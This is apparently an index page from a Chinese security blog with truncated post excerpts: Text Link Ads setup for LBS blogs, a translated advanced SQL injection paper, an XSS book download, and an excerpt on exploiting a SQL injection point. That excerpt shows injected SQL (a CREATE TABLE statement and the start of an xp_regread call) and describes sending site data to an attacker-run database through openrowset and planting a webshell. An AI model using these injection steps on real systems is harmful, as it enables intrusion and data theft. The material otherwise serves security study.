鬼仔's Blog

来源：milw0rm

阅读全文 »

鬼仔注：很多使用LBS的朋友在放置 LBS 放置 Text Link Ads 代码的方法 ，希望对大家有所帮助。

来源：广告发布者论坛

Text Link Ads 是一家提供文字链接交易的平台，用户主要通过它出售和购买文字链接。Text LinkAds主要针对的是blog，所以blog的链接会相对比较好出售。Text LinkAds目前只有英文版本，但是它支持所有语言的网站，在Text 阅读全文 »

鬼仔：
转载请注明来源（ http://www.huaidan.org/blog ）

Text Link Ads 最近很火，如果你还不知道 Text Link Ads 是什么的话，那看看 这篇文章 吧，里面包括了申请攻略。
很多使用 LBS 的朋友在放置代码的时候遇到了问题，这里跟大家说下 LBS 放置 Text Link Ads 代码的方法，希望对那些使用 LBS ，但是在放置 Text Link Ads 代码时遇到问题的朋友有所帮助。效果请看 阅读全文 »

/*******************************************************
作者：Chris Anley（[email protected]）
翻译：黯魂[S.S.T]
注意：转载请注明来自http://www.m0ther.cn,并恳请指正其中不准确之处:)
另外,译文我已经做成pdf格式文档,需要的朋友可以直接下载.
下载地址为:http://www.m0ther.cn/paper/advanced_sql_injection.pdf
********************************************************/

基于SQL server应用的高级SQL注入技术
阅读全文 »

来源：milw0rm

阅读全文 »

鬼仔注：一本关于XSS的书，PDF格式，英文版。
7jdg那里看到的。
不过7j那里的下载链接好像失效了
我重传到了另外一个地方，提供下载。

下载地址：
Xss Exploits and Defense (Paperback).rar

亚马逊上关于此书的介绍：
http://www.amazon.com/Cross-Site-Scripting-Attacks-Exploits/dp/1597491543

图：

文章作者：疯狗 http://www.cnbct.org/

得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库

然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))–

在对方执行 DECLARE @result varchar(255) exec master.dbo.xp_regread 阅读全文 »

来源：gyzy's Blog

一个网页，两个PDF

下载地址： Office文档格式资料.rar